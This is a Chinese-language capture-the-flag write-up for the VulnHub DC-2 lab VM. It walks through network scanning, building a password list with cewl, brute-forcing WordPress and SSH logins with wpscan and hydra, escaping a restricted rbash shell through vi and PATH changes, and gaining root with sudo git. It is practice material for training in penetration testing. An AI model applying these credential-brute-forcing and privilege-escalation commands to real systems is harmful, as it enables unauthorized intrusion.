靶机地址:https://www.vulnhub.com/entry/dc-2,311/
目标:there are five flags including the final flag.the only flag that really counts, is the final flag.
主机信息
-
Kali:192.168.11.131
-
DC9:192.168.11.138
渗透过程
1、主机探测
先进行主机探测,查找靶机的IP地址
arp-scan -l
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 00:50:56:f3:b5:59 VMware, Inc.
192.168.11.138 00:0c:29:2c:b6:45 VMware, Inc.
192.168.11.254 00:50:56:ed:2e:ad VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 3 responded
对主机进行排查确定,DC-2的IP地址为192.168.11.138
2、端口扫描
用nmap对DC-2进行全端口扫描
nmap -sV -p- 192.168.11.138
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.11.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-20 14:15 CST
Nmap scan report for dc-2 (192.168.11.138)
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:2C:B6:45 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds
发现80端口运行Web服务,7744端口为SSH服务
3、WEB探测
直接访问http://192.168.11.138/
页面一直转圈圈无响应
最后跳转http://dc-2/
页面加载失败
以我英语十级的能力翻译一下为
嗯。我们很难找到那个网站。
我们无法连接到dc-2上的服务器。
如果这个地址是正确的,你可以尝试其他三件事:
请稍后再试。
请检查您的网络连接。
如果您已连接但位于防火墙后面,请检查Firefox是否具有访问Web的权限。
去配置/etc/hosts文件添加以下本地DNS的解析即可
192.168.11.138 dc-2
┌──(root㉿kali)-[~]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.11.138 dc-2
修改后访问成功
4、flag1
对WEB进行信息收集,发现站点模板为WordPress 4.7.10
并且在http://dc-2/index.php/flag/
中找到flag1及其后续flag提示
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
5、flag2
根据提示可以想到WordPress存在默认后台,尝试访问(也可以用dirb扫)
访问成功,考虑爆破(用户名+密码)
根据提示使用cewl爬取字典文件(密码)
cewl http://dc-2/ -w pass.txt
-w, --write:将输出写入文件。
┌──(root㉿kali)-[~]
└─# cewl http://dc-2/ -w pass.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
站点模板为WordPress,使用wpscan枚举用户名
wpscan --url http://dc-2/ -e u
--url URL:要扫描的博客的url
-e, --enumerate [OPTS]:枚举过程,可用选项
u:用户ID范围。
┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
共枚举出三个用户
-
admin
-
jerry
-
tom
将用户名保存到user.txt中
echo admin > user.txt ;echo jerry >> user.txt ;echo tom >> user.txt
使用wpscan爆破账号密码
wpscan --url http://dc-2/ -U user.txt -P pass.txt
-U, --usernames LIST:密码攻击期间要使用的用户名列表。
-P, --passwords FILE-PATH:密码攻击期间要使用的密码列表。
┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -U user.txt -P pass.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
爆破出两组口令
第一组
用户名:jerry
密码:adipiscing
第二组
用户名:tom
密码:parturient
尝试登录后台(两组用户均可登录),登陆成功。
在jerry用户的pages页面发现flag2以及剩余flag提示
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
6、flag3
原本思路为使用插件拓展或主题插入Shell提权,但是提示不允许通过WordPress提权。
考虑使用hydra工具利用已知账号密码通过SSH登录服务器
hydra -L user.txt -P pass.txt ssh://192.168.11.138 -s 7744
-l LOGIN or -L FILE:使用login名称登录,或从FILE加载多个登录
-p PASS or -P FILE:尝试密码PASS,或从FILE加载多个密码
-s PORT:如果服务在不同的默认端口上,请在此处定义
┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P pass.txt ssh://192.168.11.138 -s 7744
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-20 15:41:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://192.168.11.138:7744/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 560 to do in 00:04h, 14 active
[STATUS] 107.33 tries/min, 322 tries in 00:03h, 402 to do in 00:04h, 6 active
[STATUS] 67.43 tries/min, 472 tries in 00:07h, 252 to do in 00:04h, 6 active
[7744][ssh] host: 192.168.11.138 login: tom password: parturient
[STATUS] 60.33 tries/min, 724 tries in 00:12h, 1 to do in 00:01h, 1 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-20 15:53:56
爆破出tom账户
-
用户名:tom
-
密码:parturient
SSH登录
ssh tom@192.168.11.138 -p 7744
┌──(root㉿kali)-[~]
└─# ssh tom@192.168.11.138 -p 7744
The authenticity of host '[192.168.11.138]:7744 ([192.168.11.138]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.11.138]:7744' (ED25519) to the list of known hosts.
tom@192.168.11.138's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$
找到flag3
tom@DC-2:~$ ls -al
total 40
drwxr-x--- 3 tom tom 4096 Mar 21 2019 .
drwxr-xr-x 4 root root 4096 Mar 21 2019 ..
-rwxr-x--- 1 tom tom 66 Mar 21 2019 .bash_history
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_login
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_logout
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bash_profile
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .bashrc
-rwxr-x--- 1 tom tom 95 Mar 21 2019 flag3.txt
-rwxr-x--- 1 tom tom 30 Mar 21 2019 .profile
drwxr-x--- 3 tom tom 4096 Mar 21 2019 usr
但是发现cat命令被rbash限制了
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
查看可用命令
compgen -c
tom@DC-2:~$ compgen -c
if
then
else
elif
fi
case
esac
for
select
while
until
do
done
in
function
time
{
}
!
[[
]]
coproc
__expand_tilde_by_ref
__get_cword_at_cursor_by_ref
__git_eread
__git_ps1
__git_ps1_colorize_gitstring
__git_ps1_show_upstream
__grub_dir
__grub_get_last_option
__grub_get_options_from_help
__grub_get_options_from_usage
__grub_list_menuentries
__grub_list_modules
__grubcomp
__ltrim_colon_completions
__parse_options
__reassemble_comp_words_by_ref
_a2disconf
_a2dismod
_a2dissite
_a2enconf
_a2enmod
_a2ensite
_allowed_groups
_allowed_users
_apache2_allcomp
_apache2_conf
_apache2_mods
_apache2_sites
_available_interfaces
_cd
_cd_devices
_command
_command_offset
_complete_as_root
_completion_loader
_configured_interfaces
_count_args
_debconf_show
_dvd_devices
_expand
_filedir
_filedir_xspec
_fstypes
_get_comp_words_by_ref
_get_cword
_get_first_arg
_get_pword
_gids
_grub_editenv
_grub_install
_grub_mkconfig
_grub_mkfont
_grub_mkimage
_grub_mkpasswd_pbkdf2
_grub_mkrescue
_grub_probe
_grub_script_check
_grub_set_entry
_grub_setup
_have
_init_completion
_insserv
_installed_modules
_ip_addresses
_kernel_versions
_known_hosts
_known_hosts_real
_longopt
_mac_addresses
_minimal
_modules
_ncpus
_parse_help
_parse_usage
_pci_ids
_pgids
_pids
_pnames
_pygmentize
_quote_readline_by_ref
_realcommand
_rl_enabled
_root_command
_service
_services
_shells
_signals
_split_longopt
_sysvdirs
_terms
_tilde
_uids
_update_initramfs
_upvar
_upvars
_usb_ids
_user_at_host
_usergroup
_userland
_variables
_xfunc
_xinetd_services
dequote
quote
quote_readline
.
:
[
alias
bg
bind
break
builtin
caller
cd
command
compgen
complete
compopt
continue
declare
dirs
disown
echo
enable
eval
exec
exit
export
false
fc
fg
getopts
hash
help
history
jobs
kill
let
local
logout
mapfile
popd
printf
pushd
pwd
read
readarray
readonly
return
set
shift
shopt
source
suspend
test
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
less
scp
ls
vi
vi未被限制,使用vi查看flag3发现给的提示
vi flag3.txt
tom@DC-2:~$ vi flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
7、flag4
提示提到Tom、Jerry两个用户和提权命令。
大部分命令都被rbash限制,考虑尝试vi提权
-
vi打开flag3.txt文件(vi flag3.txt)
-
命令模式执行以下命令提权
-
:set shell=/bin/sh
-
:shell
-
-
提权成功(bash环境从rbash切换到了sh),但是大部分命令依旧被限制
tom@DC-2:~$ vi flag3.txt
$ whoami
/bin/sh: 1: whoami: not found
$ id
/bin/sh: 2: id: not found
根据提示切换到jerry家目录,查看发现flag4.txt,但是cat命令也被限制
$ cd /home/jerry
$ ls -al
total 28
drwxr-xr-x 2 jerry jerry 4096 Mar 21 2019 .
drwxr-xr-x 4 root root 4096 Mar 21 2019 ..
-rw------- 1 jerry jerry 109 Mar 21 2019 .bash_history
-rw-r--r-- 1 jerry jerry 220 Mar 21 2019 .bash_logout
-rw-r--r-- 1 jerry jerry 3515 Mar 21 2019 .bashrc
-rw-r--r-- 1 jerry jerry 223 Mar 21 2019 flag4.txt
-rw-r--r-- 1 jerry jerry 675 Mar 21 2019 .profile
$ cat flag4.txt
/bin/sh: 16: cat: not found
使用vi查看flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
8、flag5
提示使用git提权获取最后的flag5。
但是当前环境无法使用git,准备再次提权
$ git
/bin/sh: 26: git: not found
根据前面的提示去切jerry用户发现su命令被限制
$ su jerry
/bin/sh: 21: su: not found
发现可以查看环境变量,结果看到辛辛苦苦提权的sh环境只是比rbash环境多了个可以进入jerry家目录的权限。。。
export -p
$ export -p
export HOME='/home/tom'
export LANG='en_US.UTF-8'
export LOGNAME='tom'
export MAIL='/var/mail/tom'
export OLDPWD='/home'
export PATH='/home/tom/usr/bin'
export PWD='/home/jerry'
export SHELL='/bin/rbash'
export SHLVL='1'
export SSH_CLIENT='192.168.11.131 55440 7744'
export SSH_CONNECTION='192.168.11.131 55440 192.168.11.138 7744'
export SSH_TTY='/dev/pts/0'
export TERM='xterm-256color'
export USER='tom'
export VIM='/usr/share/vim'
export VIMRUNTIME='/usr/share/vim/vim74'
export _='jerry'
想到可以查看环境变量,尝试rbash环境变量提权
-
export PATH=$PATH:/bin/ # 设置环境变量
-
export PATH=$PATH:/usr/bin/ # 设置环境变量
环境变量已被更改,su命令正常使用
用户名:jerry
密码:adipiscing
$ su - jerry
Password:
jerry@DC-2:~$ whoami
jerry
jerry@DC-2:~$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry)
jerry@DC-2:~$
发现git正常使用
git --version
jerry@DC-2:~$ git --version
git version 2.1.4
使用git提权
-
判断
-
根据提示使用git提权
-
根据
sudo -l
判断出git具有特殊权限sudo -l
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git -
find查找具有s权限的命令(git提权)
find / -perm -u=s -type f 2>/dev/null
jerry@DC-2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
-
-
提权(需要将shell的窗口变窄,使回显信息不能一页显示)
-
提权一
-
sudo git help config
-
!/bin/bash
-
-
提权二
-
sudo git -p help
-
!/bin/bash
-
-
-
提权成功!!!
root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
获得root权限,切换到root目录下查看flag5(final-flag.txt)
cd /root/
cat final-flag.txt
root@DC-2:/home/jerry# cd /root/
root@DC-2:~# ls -al
total 32
drwx------ 2 root root 4096 Mar 21 2019 .
drwxr-xr-x 21 root root 4096 Mar 10 2019 ..
-rw------- 1 root root 212 Apr 19 11:41 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 427 Mar 21 2019 final-flag.txt
-rw------- 1 root root 46 Apr 19 11:41 .lesshst
-rw------- 1 root root 232 Mar 21 2019 .mysql_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
9、总结
-
修改HOSTS文件重定向
-
工具cewl爬取密码
-
工具wpscan爆破口令
-
工具hydra爆破SSH口令
-
vi提权
-
环境变量提权
-
git提权
至此打靶完成,游戏结束OVO